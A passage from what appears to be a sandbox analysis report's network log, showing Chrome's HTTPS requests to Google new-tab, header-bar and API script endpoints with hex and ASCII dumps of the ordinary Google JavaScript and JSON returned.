                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC454INData Raw: 4c 4f 48 64 5a 55 46 52 70 65 56 4e 79 54 6e 6c 56 65 46 56 54 51 31 39 4c 54 48 6b 33 54 30 4a 33 51 30 35 53 55 57 34 77 63 41 5a 77 42 77 5c 75 30 30 33 64 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 65 76 65 6e 74 69 64 22 3a 2d 34 39 39 31 31 34 37 30 30 36 35 33 33 39 33 37 35 37 31 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73
                                                                                                                                                                                                                                                                      Data Ascii: LOHdZUFRpeVNyTnlVeFVTQ19LTHk3T0J3Q05SUW4wcAZwBw\u003d\u003d","zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-4991147006533937571,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggests
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      9192.168.2.449751142.250.185.1964437320C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Version: 705503573
                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:33 GMT
                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC372INData Raw: 31 38 32 62 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                      Data Ascii: 182b)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                      Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                      Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                      Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                      Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC263INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 31 30 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61
                                                                                                                                                                                                                                                                      Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700310,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){va
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC226INData Raw: 64 63 0d 0a 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: dcow\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventLis
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1390INData Raw: 38 30 30 30 0d 0a 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 7a 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22
                                                                                                                                                                                                                                                                      Data Ascii: 8000tener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar yd\u003ddocument.querySelector(\".gb_I .gb_A\"),zd\u003ddocument.querySelector(\"#gb.gb_Rc\"
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1390INData Raw: 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4c 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 51 64 2c 64 65 2c 50 64 2c 52 64 2c 57 64 3b 5f 2e 4e 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74
                                                                                                                                                                                                                                                                      Data Ascii: ew _.Fd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Ld\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Md\u003dnew _.Ld(_.Hd?_.Hd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Qd,de,Pd,Rd,Wd;_.Nd\u003dfunction(a){ret
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC1390INData Raw: 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4f 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                      Data Ascii: a(a);return b\u003d\u003d\"array\"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ae\u003dfunction(a,b,c){return _.sb(a,b,c,!1)!\u003d\u003dvoid 0};_.be\u003dfunction(a,b){return _.Od(_.Ec(a,b))};_.S\u003dfunction(a,b){return


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      10192.168.2.449752142.250.185.1964437320C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Version: 705503573
                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:33 GMT
                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                      2024-12-31 20:33:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      11192.168.2.449802142.250.181.2384437320C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC733OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                                      Host: apis.google.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC915INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                                      Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                                      Content-Length: 117446
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      Server: sffe
                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 09:40:26 GMT
                                                                                                                                                                                                                                                                      Expires: Wed, 31 Dec 2025 09:40:26 GMT
                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Age: 39190
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC475INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20
